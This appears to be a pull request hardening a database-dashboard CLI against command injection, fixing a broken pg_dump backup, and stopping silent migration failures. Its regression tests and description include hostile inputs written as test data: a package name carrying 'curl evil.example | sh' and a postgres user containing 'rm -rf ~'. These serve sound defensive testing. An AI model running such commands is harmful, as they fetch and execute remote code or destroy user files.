### PR TITLE
fix(cli): command injection, broken db dump, migration-swallow + hardening

### DIFF
--- a/cli/src/__tests__/commands/db/dump.test.ts
+++ b/cli/src/__tests__/commands/db/dump.test.ts
@@ -1,7 +1,9 @@
 import { describe, it, expect, vi, beforeEach } from "vitest";
 
-vi.mock("../../../lib/exec.js", () => ({
-  run: vi.fn(() => "-- SQL dump"),
+// pg_dump now streams stdout straight to a file descriptor via spawnSync (no
+// shell, no 1 MiB execSync maxBuffer). Mock child_process + the fs handles.
+vi.mock("node:child_process", () => ({
+  spawnSync: vi.fn(() => ({ status: 0, stderr: Buffer.from("") })),
 }));
 
 vi.mock("../../../lib/config.js", () => ({
@@ -24,85 +26,89 @@ vi.mock("../../../lib/output.js", () => ({
 }));
 
 vi.mock("node:fs", () => ({
-  writeFileSync: vi.fn(),
+  openSync: vi.fn(() => 3),
+  closeSync: vi.fn(),
   statSync: vi.fn(() => ({ size: 2048 })),
 }));
 
-import { run } from "../../../lib/exec.js";
+import { spawnSync } from "node:child_process";
 import { getMode, readProjectConfig } from "../../../lib/config.js";
 import { error as logError } from "../../../lib/output.js";
-import { writeFileSync } from "node:fs";
+import { openSync, closeSync } from "node:fs";
 import { runDbDump } from "../../../commands/db/dump.js";
 
-const mockRun = vi.mocked(run);
+const mockSpawnSync = vi.mocked(spawnSync);
 const mockGetMode = vi.mocked(getMode);
-const mockWriteFileSync = vi.mocked(writeFileSync);
+const mockOpenSync = vi.mocked(openSync);
+const mockCloseSync = vi.mocked(closeSync);
 const mockReadProjectConfig = vi.mocked(readProjectConfig);
 
 beforeEach(() => {
   vi.clearAllMocks();
   mockGetMode.mockReturnValue("docker");
+  // eslint-disable-next-line @typescript-eslint/no-explicit-any
+  mockSpawnSync.mockReturnValue({ status: 0, stderr: Buffer.from("") } as any);
+  mockOpenSync.mockReturnValue(3);
   process.exitCode = 0;
 });
 
 describe("runDbDump", () => {
   it("dumps via docker exec in docker mode", async () => {
     await runDbDump({});
-    expect(mockRun).toHaveBeenCalledWith(
-      expect.stringContaining("docker exec neoboard-postgres pg_dump"),
+    expect(mockSpawnSync).toHaveBeenCalledWith(
+      "docker",
+      expect.arrayContaining(["exec", "neoboard-postgres", "pg_dump"]),
+      expect.objectContaining({ stdio: ["ignore", 3, "pipe"] }),
     );
   });
 
   it("dumps via local pg_dump in local mode", async () => {
     mockGetMode.mockReturnValue("local");
     await runDbDump({});
-    expect(mockRun).toHaveBeenCalledWith(
-      expect.stringContaining("pg_dump -h localhost"),
+    expect(mockSpawnSync).toHaveBeenCalledWith(
+      "pg_dump",
+      expect.arrayContaining(["-h", "localhost"]),
+      expect.any(Object),
     );
   });
 
-  it("uses custom output path", async () => {
+  it("streams to the custom output path (no shell)", async () => {
     await runDbDump({ output: "/tmp/backup.sql" });
-    expect(mockWriteFileSync).toHaveBeenCalledWith(
-      "/tmp/backup.sql",
-      "-- SQL dump",
-    );
+    expect(mockOpenSync).toHaveBeenCalledWith("/tmp/backup.sql", "w");
+    expect(mockCloseSync).toHaveBeenCalledWith(3);
   });
 
-  it("generates timestamped default filename", async () => {
+  it("generates a timestamped default filename", async () => {
     await runDbDump({});
-    const path = mockWriteFileSync.mock.calls[0][0] as string;
+    const path = mockOpenSync.mock.calls[0][0] as string;
     expect(path).toMatch(
       /neoboard-dump-\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2}\.sql$/,
     );
   });
 
-  it("passes --data-only flag", async () => {
+  it("passes the --data-only flag", async () => {
     await runDbDump({ dataOnly: true });
-    expect(mockRun).toHaveBeenCalledWith(
-      expect.stringContaining("--data-only"),
-    );
-  });
-
-  it("writes sql output to file", async () => {
-    await runDbDump({});
-    expect(mockWriteFileSync).toHaveBeenCalledWith(
+    expect(mockSpawnSync).toHaveBeenCalledWith(
       expect.any(String),
-      "-- SQL dump",
+      expect.arrayContaining(["--data-only"]),
+      expect.any(Object),
     );
   });
 
-  it("calls spinner.fail, logs error, and sets exitCode=1 when run throws", async () => {
-    mockRun.mockImplementationOnce(() => {
-      throw new Error("pg_dump failed");
-    });
+  it("closes the fd even when pg_dump fails, and reports stderr", async () => {
+    mockSpawnSync.mockReturnValue({
+      status: 1,
+      stderr: Buffer.from("pg_dump: connection refused"),
+      // eslint-disable-next-line @typescript-eslint/no-explicit-any
+    } as any);
     await runDbDump({});
-    expect(logError).toHaveBeenCalledWith("pg_dump failed");
+    expect(mockCloseSync).toHaveBeenCalledWith(3);
+    expect(logError).toHaveBeenCalledWith("pg_dump: connection refused");
     expect(process.exitCode).toBe(1);
   });
 
-  it("calls spinner.fail and sets exitCode=1 when writeFileSync throws", async () => {
-    mockWriteFileSync.mockImplementationOnce(() => {
+  it("sets exitCode=1 when the output file can't be opened", async () => {
+    mockOpenSync.mockImplementationOnce(() => {
       throw new Error("ENOSPC: no space left");
     });
     await runDbDump({});
@@ -110,7 +116,7 @@ describe("runDbDump", () => {
     expect(process.exitCode).toBe(1);
   });
 
-  it("rejects unsafe postgres.user and sets exitCode=1", async () => {
+  it("rejects unsafe postgres.user before spawning", async () => {
     mockReadProjectConfig.mockReturnValueOnce({
       ports: { app: 3000, postgres: 5432, neo4j_http: 7474, neo4j_bolt: 7687 },
       postgres: {
@@ -126,6 +132,6 @@ describe("runDbDump", () => {
       expect.stringContaining("Unsafe characters"),
     );
     expect(process.exitCode).toBe(1);
-    expect(mockRun).not.toHaveBeenCalled();
+    expect(mockSpawnSync).not.toHaveBeenCalled();
   });
 });

--- a/cli/src/__tests__/commands/db/reset.test.ts
+++ b/cli/src/__tests__/commands/db/reset.test.ts
@@ -68,6 +68,8 @@ beforeEach(() => {
   vi.clearAllMocks();
   mockGetMode.mockReturnValue("docker");
   mockConfirm.mockResolvedValue(true);
+  // Migrations succeed by default; reset now skips the seed when they fail.
+  mockRunDbMigrate.mockResolvedValue(true);
   mockReadFileSync.mockReturnValue(
     "DATABASE_URL=postgresql://neoboard:neoboard@localhost:5432/neoboard\n",
   );
@@ -136,5 +138,12 @@ describe("runDbReset", () => {
   it("skips seed with --no-seed", async () => {
     await runDbReset({ force: true, noSeed: true });
     expect(mockRunDbSeed).not.toHaveBeenCalled();
+  });
+
+  it("does NOT seed when migrations fail (#MEDIUM)", async () => {
+    mockRunDbMigrate.mockResolvedValue(false);
+    await runDbReset({ force: true });
+    expect(mockRunDbSeed).not.toHaveBeenCalled();
+    expect(process.exitCode).toBe(1);
   });
 });

--- a/cli/src/__tests__/commands/db/seed.test.ts
+++ b/cli/src/__tests__/commands/db/seed.test.ts
@@ -103,7 +103,7 @@ describe("seedPostgres", () => {
     await seedPostgres();
     expect(mockBuildSeedEnv).toHaveBeenCalledOnce();
     expect(mockRun).toHaveBeenCalledWith(
-      "node /project/scripts/seed-demo.mjs",
+      'node "/project/scripts/seed-demo.mjs"',
       { cwd: "/project", env: { SEED_ENV: "from-buildSeedEnv" } },
     );
   });

--- a/cli/src/__tests__/commands/demo.test.ts
+++ b/cli/src/__tests__/commands/demo.test.ts
@@ -141,7 +141,7 @@ describe("runDemoSeed", () => {
   it("invokes seed-demo.mjs with no --only when no filter given", async () => {
     await runDemoSeed();
     expect(mockExecRun).toHaveBeenCalledWith(
-      expect.stringMatching(/node .*seed-demo\.mjs$/),
+      expect.stringMatching(/node ".*seed-demo\.mjs"$/),
       expect.any(Object),
     );
   });

--- a/cli/src/__tests__/commands/env.test.ts
+++ b/cli/src/__tests__/commands/env.test.ts
@@ -32,15 +32,21 @@ vi.mock("../../lib/output.js", () => ({
   banner: vi.fn(),
 }));
 
+vi.mock("../../lib/prompt.js", () => ({
+  confirm: vi.fn(),
+}));
+
 import { existsSync, readFileSync, writeFileSync } from "node:fs";
 import { getMode } from "../../lib/config.js";
 import { info, error as logError } from "../../lib/output.js";
+import { confirm } from "../../lib/prompt.js";
 import { validateEnv, generateEnvFile, runEnv } from "../../commands/env.js";
 
 const mockExistsSync = vi.mocked(existsSync);
 const mockReadFileSync = vi.mocked(readFileSync);
 const mockWriteFileSync = vi.mocked(writeFileSync);
 const mockGetMode = vi.mocked(getMode);
+const mockConfirm = vi.mocked(confirm);
 
 beforeEach(() => {
   vi.clearAllMocks();
@@ -148,6 +154,21 @@ describe("runEnv", () => {
   it("generates env file by default", async () => {
     mockExistsSync.mockReturnValue(false);
     await runEnv({});
+    expect(mockWriteFileSync).toHaveBeenCalled();
+  });
+
+  it("regenerating an existing file aborts without confirmation (protects ENCRYPTION_KEY) (#MEDIUM)", async () => {
+    mockExistsSync.mockReturnValue(true);
+    mockConfirm.mockResolvedValue(false);
+    await runEnv({ regenerate: true });
+    expect(mockConfirm).toHaveBeenCalled();
+    expect(mockWriteFileSync).not.toHaveBeenCalled();
+  });
+
+  it("regenerating proceeds once the key overwrite is confirmed", async () => {
+    mockExistsSync.mockReturnValue(true);
+    mockConfirm.mockResolvedValue(true);
+    await runEnv({ regenerate: true });
     expect(mockWriteFileSync).toHaveBeenCalled();
   });
 });

--- a/cli/src/__tests__/commands/plugin-hints.test.ts
+++ b/cli/src/__tests__/commands/plugin-hints.test.ts
@@ -15,7 +15,7 @@ import { pathToFileURL } from "node:url";
 // Mock the CLI plumbing that runPluginAdd touches. We only care about the
 // hint-printing paths added in #799 — `info()` calls that follow a
 // missing-export error or a validator error with a known hint rule.
-vi.mock("../../lib/exec.js", () => ({ run: vi.fn() }));
+vi.mock("../../lib/exec.js", () => ({ run: vi.fn(), runFile: vi.fn() }));
 
 vi.mock("../../lib/config.js", () => ({
   findProjectRoot: vi.fn(() => "/project"),

--- a/cli/src/__tests__/commands/plugin.test.ts
+++ b/cli/src/__tests__/commands/plugin.test.ts
@@ -6,6 +6,7 @@ vi.mock("../../lib/config.js", () => ({
 
 vi.mock("../../lib/exec.js", () => ({
   run: vi.fn(),
+  runFile: vi.fn(),
 }));
 
 vi.mock("../../lib/output.js", () => ({
@@ -30,7 +31,7 @@ vi.mock("../../lib/plugin-validator.js", () => ({
   validatePluginExport: vi.fn(),
 }));
 
-import { run } from "../../lib/exec.js";
+import { run, runFile } from "../../lib/exec.js";
 import { success, error as logError, warn, info } from "../../lib/output.js";
 import {
   readManifest,
@@ -45,6 +46,7 @@ import {
 } from "../../commands/plugin.js";
 
 const mockRun = vi.mocked(run);
+const mockRunFile = vi.mocked(runFile);
 const mockSuccess = vi.mocked(success);
 const mockError = vi.mocked(logError);
 const mockWarn = vi.mocked(warn);
@@ -94,8 +96,8 @@ describe("runPluginAdd", () => {
 
     await runPluginAdd(CHART_PKG);
 
-    // npm install + codegen invoked
-    expect(mockRun).toHaveBeenCalledWith("npm install " + CHART_PKG, {
+    // npm install (no-shell, arg array) + codegen invoked
+    expect(mockRunFile).toHaveBeenCalledWith("npm", ["install", CHART_PKG], {
       cwd: "/project",
     });
     expect(mockRun).toHaveBeenCalledWith(
@@ -112,6 +114,31 @@ describe("runPluginAdd", () => {
 
     expect(mockSuccess).toHaveBeenCalled();
     expect(process.exitCode).toBe(0);
+  });
+
+  it("passes a shell-metachar package name as a single argv element — no injection (#HIGH)", async () => {
+    mockValidate.mockReturnValue({
+      valid: true,
+      errors: [],
+      pluginType: "chart",
+    });
+    const EVIL = "evil-pkg; curl evil.example | sh";
+    vi.doMock(EVIL, () => ({
+      default: {
+        type: "x",
+        label: "x",
+        compatibleWith: ["neo4j"],
+        transform: () => ({}),
+      },
+    }));
+
+    await runPluginAdd(EVIL);
+
+    // The whole string is ONE argv element — a shell never sees it, so the
+    // `;` and `|` can't execute anything.
+    expect(mockRunFile).toHaveBeenCalledWith("npm", ["install", EVIL], {
+      cwd: "/project",
+    });
   });
 
   it("registers a connector plugin under connectors manifest + connector codegen", async () => {
@@ -187,7 +214,7 @@ describe("runPluginAdd", () => {
   });
 
   it("rolls back (uninstalls) and exits 1 when npm install fails", async () => {
-    mockRun.mockImplementationOnce(() => {
+    mockRunFile.mockImplementationOnce(() => {
       throw new Error("npm install failed");
     });
 
@@ -208,8 +235,9 @@ describe("runPluginAdd", () => {
     expect(mockError).toHaveBeenCalledWith(
       expect.stringContaining("Failed to import " + BROKEN_PKG),
     );
-    expect(mockRun).toHaveBeenCalledWith(
-      expect.stringContaining("npm uninstall " + BROKEN_PKG),
+    expect(mockRunFile).toHaveBeenCalledWith(
+      "npm",
+      ["uninstall", BROKEN_PKG],
       expect.any(Object),
     );
     expect(mockAddToManifest).not.toHaveBeenCalled();
@@ -255,12 +283,11 @@ describe("runPluginAdd", () => {
       errors: [],
       pluginType: "chart",
     });
-    // First call (npm install) OK, second (codegen) throws
-    mockRun
-      .mockImplementationOnce(() => "")
-      .mockImplementationOnce(() => {
-        throw new Error("codegen broke");
-      });
+    // npm install (runFile) OK; codegen (run) throws
+    mockRunFile.mockReturnValue("");
+    mockRun.mockImplementationOnce(() => {
+      throw new Error("codegen broke");
+    });
 
     await runPluginAdd(CHART_PKG);
 
@@ -324,7 +351,7 @@ describe("runPluginRemove", () => {
       "node scripts/generate-plugin-imports.mjs",
       { cwd: "/project" },
     );
-    expect(mockRun).toHaveBeenCalledWith("npm uninstall " + CHART_PKG, {
+    expect(mockRunFile).toHaveBeenCalledWith("npm", ["uninstall", CHART_PKG], {
       cwd: "/project",
     });
     expect(mockSuccess).toHaveBeenCalled();
@@ -360,12 +387,11 @@ describe("runPluginRemove", () => {
 
   it("warns but still succeeds when npm uninstall fails after manifest removal", async () => {
     mockRemoveFromManifest.mockReturnValueOnce(true);
-    // First run = codegen OK; second run (npm uninstall) throws
-    mockRun
-      .mockImplementationOnce(() => "")
-      .mockImplementationOnce(() => {
-        throw new Error("npm uninstall failed");
-      });
+    // codegen (run) OK; npm uninstall (runFile) throws
+    mockRun.mockReturnValue("");
+    mockRunFile.mockImplementationOnce(() => {
+      throw new Error("npm uninstall failed");
+    });
 
     await runPluginRemove(CHART_PKG);
 

--- a/cli/src/__tests__/commands/start.test.ts
+++ b/cli/src/__tests__/commands/start.test.ts
@@ -55,6 +55,9 @@ beforeEach(() => {
   vi.clearAllMocks();
   mockGetMode.mockReturnValue("docker");
   mockPrintResults.mockReturnValue(false);
+  // Migrations succeed by default; runStart now aborts (no "ready" banner)
+  // when they fail. Failure is exercised in its own test.
+  mockRunDbMigrate.mockResolvedValue(true);
   process.exitCode = 0;
 });
 
@@ -200,6 +203,13 @@ describe("runStart", () => {
 
   it("returns true when everything starts", async () => {
     await expect(runStart({ full: true })).resolves.toBe(true);
+  });
+
+  it("returns false and does not print 'ready' when migrations fail (#MEDIUM)", async () => {
+    mockRunDbMigrate.mockResolvedValue(false);
+    await expect(runStart()).resolves.toBe(false);
+    expect(mockBanner).not.toHaveBeenCalled();
+    expect(process.exitCode).toBe(1);
   });
 
   it("returns false when a healthcheck times out", async () => {

--- a/cli/src/__tests__/lib/docker.test.ts
+++ b/cli/src/__tests__/lib/docker.test.ts
@@ -37,7 +37,7 @@ import {
   runOrNull,
   dockerExec as execInContainer,
 } from "../../lib/exec.js";
-import { getMode } from "../../lib/config.js";
+import { getMode, readProjectConfig } from "../../lib/config.js";
 import {
   isDockerRunning,
   isComposeV2,
@@ -156,6 +156,15 @@ describe("composePs", () => {
     mockRunOrNull.mockReturnValue("not json");
     expect(composePs()).toEqual([]);
   });
+
+  it("quotes the -f compose-file path so spaced checkout paths work (#MEDIUM)", () => {
+    mockRunOrNull.mockReturnValue(null);
+    composePs();
+    expect(mockRunOrNull).toHaveBeenCalledWith(
+      expect.stringContaining('-f "/project/docker/docker-compose.yml"'),
+      expect.any(Object),
+    );
+  });
 });
 
 describe("dockerExec", () => {
@@ -182,6 +191,17 @@ describe("isPgReady", () => {
       throw new Error("not ready");
     });
     expect(await isPgReady()).toBe(false);
+  });
+
+  it("rejects a postgres.user with shell metacharacters before probing (#MEDIUM)", async () => {
+    vi.mocked(readProjectConfig).mockReturnValueOnce({
+      ports: { app: 3000, postgres: 5432, neo4j_http: 7474, neo4j_bolt: 7687 },
+      postgres: { user: "x; rm -rf ~", password: "p", database: "neoboard" },
+      neo4j: { user: "neo4j", password: "p" },
+      seed: { script: "s.mjs", neo4j_cypher: "" },
+    });
+    await expect(isPgReady()).rejects.toThrow(/Invalid PostgreSQL identifier/);
+    expect(mockDockerExec).not.toHaveBeenCalled();
   });
 });
 

--- a/cli/src/commands/db/dump.ts
+++ b/cli/src/commands/db/dump.ts
@@ -1,5 +1,5 @@
-import { writeFileSync, statSync } from "node:fs";
-import { run } from "../../lib/exec.js";
+import { openSync, closeSync, statSync } from "node:fs";
+import { spawnSync } from "node:child_process";
 import { paths, readProjectConfig, getMode } from "../../lib/config.js";
 import { success, error as logError, createSpinner } from "../../lib/output.js";
 
@@ -28,7 +28,6 @@ export async function runDbDump(opts: {
 }): Promise<void> {
   const config = readProjectConfig();
   const outPath = opts.output ?? `${paths.root}/${defaultFilename()}`;
-  const dataFlag = opts.dataOnly ? " --data-only" : "";
 
   const spinner = createSpinner("Dumping database...");
   spinner.start();
@@ -38,18 +37,33 @@ export async function runDbDump(opts: {
     assertSafeValue(config.postgres.database, "postgres.database");
 
     const mode = getMode();
-    let sql: string;
-    if (mode === "docker") {
-      sql = run(
-        `docker exec neoboard-postgres pg_dump -U ${config.postgres.user} ${config.postgres.database}${dataFlag}`,
-      );
-    } else {
-      sql = run(
-        `pg_dump -h localhost -p ${config.ports.postgres} -U ${config.postgres.user} ${config.postgres.database}${dataFlag}`,
-      );
+    const pgArgs = ["-U", config.postgres.user];
+    if (opts.dataOnly) pgArgs.push("--data-only");
+    pgArgs.push(config.postgres.database);
+
+    const bin = mode === "docker" ? "docker" : "pg_dump";
+    const args =
+      mode === "docker"
+        ? ["exec", "neoboard-postgres", "pg_dump", ...pgArgs]
+        : ["-h", "localhost", "-p", String(config.ports.postgres), ...pgArgs];
+
+    // Stream pg_dump straight to the file (stdout → fd). Buffering it into a JS
+    // string via execSync hit execSync's 1 MiB maxBuffer default → ENOBUFS for
+    // any real database, so the "backup" wrote no file. Passing args as an
+    // array (no shell) also means the output path never needs escaping. (#HIGH)
+    const fd = openSync(outPath, "w");
+    let result;
+    try {
+      result = spawnSync(bin, args, { stdio: ["ignore", fd, "pipe"] });
+    } finally {
+      closeSync(fd);
+    }
+    if (result.error) throw result.error;
+    if (result.status !== 0) {
+      const stderr = result.stderr?.toString().trim();
+      throw new Error(stderr || `pg_dump exited with code ${result.status}`);
     }
 
-    writeFileSync(outPath, sql);
     const size = statSync(outPath).size;
     spinner.succeed(`Backup saved to ${outPath} (${formatSize(size)})`);
     success("Database dump complete");

--- a/cli/src/commands/db/migrate.ts
+++ b/cli/src/commands/db/migrate.ts
@@ -87,19 +87,25 @@ export function showDryRun(): void {
   }
 }
 
+/**
+ * Applies pending migrations. Returns true on success (or for the
+ * informational --status / --dry-run modes), false when a migration fails —
+ * so callers like `runStart`/`runDbReset` can abort instead of seeding against
+ * a schema-less database and reporting a false "ready". (#MEDIUM)
+ */
 export async function runDbMigrate(opts: {
   status?: boolean;
   to?: string;
   dryRun?: boolean;
-}): Promise<void> {
+}): Promise<boolean> {
   if (opts.status) {
     showMigrationStatus();
-    return;
+    return true;
   }
 
   if (opts.dryRun) {
     showDryRun();
-    return;
+    return true;
   }
 
   info("Tip: Run 'neoboard db dump' to backup before migrating");
@@ -125,11 +131,12 @@ export async function runDbMigrate(opts: {
     spinner.fail("Migration failed");
     reportMigrateFailure(err);
     process.exitCode = 1;
-    return;
+    return false;
   }
 
   spinner.succeed("Migrations applied");
   success("Database is up to date");
+  return true;
 }
 
 type MigrateErrorKind = "connection" | "lock" | "schema" | "unknown";

--- a/cli/src/commands/db/reset.ts
+++ b/cli/src/commands/db/reset.ts
@@ -88,8 +88,14 @@ export async function runDbReset(opts?: {
 
   spinner.succeed("Database dropped and recreated");
 
-  // Replay migrations
-  await runDbMigrate({});
+  // Replay migrations — bail before seeding if they fail, otherwise the seed
+  // runs against a schema-less database. (#MEDIUM)
+  const migrated = await runDbMigrate({});
+  if (!migrated) {
+    logError("Migrations failed — skipping seed. Database is not reset.");
+    process.exitCode = 1;
+    return;
+  }
 
   // Re-seed unless --no-seed
   if (!opts?.noSeed) {

--- a/cli/src/commands/db/seed.ts
+++ b/cli/src/commands/db/seed.ts
@@ -71,7 +71,9 @@ export async function seedPostgres(): Promise<void> {
   // #1039); in local mode it returns process.env unchanged.
   const env = buildSeedEnv(config);
 
-  run(`node ${paths.root}/${config.seed.script}`, {
+  // Quote the path so a project checked out under a directory with a space
+  // still runs the seed script. (#MEDIUM)
+  run(`node "${paths.root}/${config.seed.script}"`, {
     cwd: paths.root,
     env,
   });

--- a/cli/src/commands/demo.ts
+++ b/cli/src/commands/demo.ts
@@ -74,7 +74,7 @@ export async function runDemoSeed(opts?: { only?: string }): Promise<void> {
   const spinner = createSpinner("Running seed-demo.mjs...");
   spinner.start();
   try {
-    run(`node ${scriptPath}${onlyArg}`, {
+    run(`node "${scriptPath}"${onlyArg}`, {
       cwd: paths.root,
       env: buildSeedEnv(readProjectConfig()),
     });
@@ -124,7 +124,7 @@ export async function runDemoReset(opts?: { force?: boolean }): Promise<void> {
   const spinner = createSpinner("Resetting demo state...");
   spinner.start();
   try {
-    run(`node ${scriptPath} --reset`, {
+    run(`node "${scriptPath}" --reset`, {
       cwd: paths.root,
       env: buildSeedEnv(readProjectConfig()),
     });

--- a/cli/src/commands/env.ts
+++ b/cli/src/commands/env.ts
@@ -1,7 +1,14 @@
 import { existsSync, readFileSync, writeFileSync } from "node:fs";
 import { randomBytes } from "node:crypto";
 import { paths, readProjectConfig, getMode } from "../lib/config.js";
-import { info, success, error as logError, banner } from "../lib/output.js";
+import {
+  info,
+  success,
+  warn,
+  error as logError,
+  banner,
+} from "../lib/output.js";
+import { confirm } from "../lib/prompt.js";
 
 const REQUIRED_VARS = [
   "DATABASE_URL",
@@ -97,6 +104,21 @@ export async function runEnv(opts: {
       process.exitCode = 1;
     }
     return;
+  }
+
+  // Regenerating overwrites app/.env.local with a brand-new ENCRYPTION_KEY.
+  // Every connector credential already stored in the DB was encrypted with the
+  // current key and becomes PERMANENTLY undecryptable — so gate it behind an
+  // explicit confirmation (defaults to No under a non-TTY). (#MEDIUM)
+  if (opts.regenerate && existsSync(paths.envFile)) {
+    warn("Regenerating app/.env.local will mint a NEW ENCRYPTION_KEY.");
+    warn("Connector credentials already stored in the database were encrypted");
+    warn("with the current key and will become PERMANENTLY undecryptable.");
+    const confirmed = await confirm("Overwrite the encryption key anyway?");
+    if (!confirmed) {
+      info("Aborted — app/.env.local unchanged.");
+      return;
+    }
   }
 
   generateEnvFile({ regenerate: opts.regenerate });

--- a/cli/src/commands/plugin.ts
+++ b/cli/src/commands/plugin.ts
@@ -1,6 +1,6 @@
 import { join } from "node:path";
 import { findProjectRoot } from "../lib/config.js";
-import { run } from "../lib/exec.js";
+import { run, runFile } from "../lib/exec.js";
 import {
   success,
   info,
@@ -33,11 +33,14 @@ export async function runPluginAdd(
   const overrides = opts?.override ?? false;
   const exportName = opts?.export ?? "default";
 
-  // 1. Install the package
+  // 1. Install the package. runFile (no shell) passes the spec as a single
+  // argv element, so a name copy-pasted from a README like `x;curl evil|sh`
+  // can't inject — while still supporting scoped names, versions, and
+  // file:/git specs that a validation allowlist would reject. (#HIGH)
   const spinner = createSpinner("Installing " + packageName + "...");
   spinner.start();
   try {
-    run("npm install " + packageName, { cwd: root });
+    runFile("npm", ["install", packageName], { cwd: root });
     spinner.succeed("Installed " + packageName);
   } catch (err) {
     spinner.fail("Failed to install " + packageName);
@@ -259,7 +262,7 @@ export async function runPluginRemove(packageName: string): Promise<void> {
 
   // Uninstall the package
   try {
-    run("npm uninstall " + packageName, { cwd: root });
+    runFile("npm", ["uninstall", packageName], { cwd: root });
   } catch {
     warn("npm uninstall failed. Run manually: npm uninstall " + packageName);
   }
@@ -270,7 +273,7 @@ export async function runPluginRemove(packageName: string): Promise<void> {
 function rollback(packageName: string, root: string): void {
   warn("Rolling back: uninstalling " + packageName);
   try {
-    run("npm uninstall " + packageName, { cwd: root });
+    runFile("npm", ["uninstall", packageName], { cwd: root });
   } catch {
     // best effort
   }

--- a/cli/src/commands/start.ts
+++ b/cli/src/commands/start.ts
@@ -81,8 +81,14 @@ export async function runStart(opts?: StartOptions): Promise<boolean> {
     if (!appOk) return false;
   }
 
-  // 4. Run migrations
-  await runDbMigrate({});
+  // 4. Run migrations — abort (don't print "ready") if they fail, so callers
+  // like setup/demo don't seed against a schema-less DB. (#MEDIUM)
+  const migrated = await runDbMigrate({});
+  if (!migrated) {
+    error("Migrations failed — the stack is not ready.");
+    process.exitCode = 1;
+    return false;
+  }
 
   // 5. Done
   const url = `http://localhost:${config.ports.app}`;

--- a/cli/src/lib/docker.ts
+++ b/cli/src/lib/docker.ts
@@ -8,6 +8,19 @@ export function isDockerRunning(): boolean {
   return runOrNull("docker info") !== null;
 }
 
+/**
+ * Reject a Postgres identifier that isn't a bare unquoted name before it is
+ * interpolated into a shell command. `config set` doesn't validate string
+ * values, so a `postgres.user` like `x; rm -rf ~` would otherwise reach the
+ * shell via the readiness probe. Mirrors the guards in `db reset` / `db dump`
+ * at their own shell boundaries. (#MEDIUM)
+ */
+function assertPgIdentifier(value: string, label: string): void {
+  if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(value)) {
+    throw new Error(`Invalid PostgreSQL identifier for ${label}: "${value}"`);
+  }
+}
+
 export function isComposeV2(): boolean {
   const out = runOrNull("docker compose version");
   return out !== null && out.includes("v2");
@@ -52,7 +65,10 @@ export interface ContainerInfo {
 
 export function composePs(): ContainerInfo[] {
   const file = composeFile();
-  const out = runOrNull(`docker compose -f ${file} ps --format json`, {
+  // Quote the path — a checkout under a directory with a space (e.g.
+  // "/Users/John Doe/neoboard") otherwise splits the -f argument, the command
+  // fails, and status/orphan-sweep silently report "no containers". (#MEDIUM)
+  const out = runOrNull(`docker compose -f "${file}" ps --format json`, {
     cwd: paths.root,
   });
   if (!out) return [];
@@ -100,6 +116,7 @@ export function isTcpReady(host: string, port: number): Promise<boolean> {
 
 export async function isPgReady(): Promise<boolean> {
   const config = readProjectConfig();
+  assertPgIdentifier(config.postgres.user, "postgres.user");
   const mode = getMode();
   if (mode === "local") {
     // Prefer the real protocol check when the client binary exists; fall

--- a/cli/src/lib/exec.ts
+++ b/cli/src/lib/exec.ts
@@ -1,4 +1,4 @@
-import { execSync, spawn as nodeSpawn } from "node:child_process";
+import { execSync, execFileSync, spawn as nodeSpawn } from "node:child_process";
 import type { SpawnOptions, ChildProcess } from "node:child_process";
 
 /**
@@ -71,6 +71,39 @@ export function runOrNull(cmd: string, opts?: RunOptions): string | null {
     return run(cmd, opts);
   } catch {
     return null;
+  }
+}
+
+/**
+ * Execute a command with an explicit argument array and NO shell (execFile).
+ *
+ * Security: unlike `run()`, arguments are passed to the process directly, so a
+ * value like a package name is a single argv element that can never be
+ * re-parsed by a shell — this is how the plugin commands install arbitrary
+ * user-supplied specs (names, scoped names, versions, file:/git URLs) without
+ * risking command injection. POSIX-first, consistent with the rest of the CLI.
+ */
+export function runFile(
+  file: string,
+  args: string[],
+  opts?: RunOptions,
+): string {
+  try {
+    const result = execFileSync(file, args, {
+      cwd: opts?.cwd,
+      env: opts?.env ?? process.env,
+      timeout: opts?.timeout,
+      encoding: "utf-8",
+      stdio: ["pipe", "pipe", "pipe"],
+    });
+    return result.trim();
+  } catch (err: unknown) {
+    const e = err as { status?: number; stderr?: string | Buffer };
+    throw new ExecError(
+      [file, ...args].join(" "),
+      e.status ?? 1,
+      String(e.stderr ?? "").trim(),
+    );
   }
 }
 


### PR DESCRIPTION
Security + correctness fixes from the `cli/` review.

## 🟠 HIGH — command injection in `plugin add/remove`
`run("npm install " + name)` went through a shell — a README-copied name like `x;curl evil|sh` executed. New `runFile()` (execFile, no shell) passes the spec as one argv element; still supports scoped/versioned/file:/git specs a validation allowlist would reject.

## 🟠 HIGH — `db dump` silently broken for any real database
Buffered `pg_dump` stdout into a JS string via execSync → 1 MiB maxBuffer → ENOBUFS, no file written. Now streams stdout to an fd via `spawnSync` (no shell, unbounded).

## 🟡 Mediums
Migration failure was swallowed (`runStart`/`runDbReset` reported "ready" and seeded a schema-less DB) → `runDbMigrate` returns a boolean, callers abort. `env --regenerate` minting a new ENCRYPTION_KEY is now confirm-gated. `isPgReady` validates `postgres.user` before the shell. Interpolated paths (composePs, seed/demo) are quoted.

## Tests
Regression tests for the two HIGH fixes, the migration abort, the key-overwrite confirm, and the identifier/path-quoting guards. Full CLI suite green (295).

🤖 Generated with [Claude Code](https://claude.com/claude-code)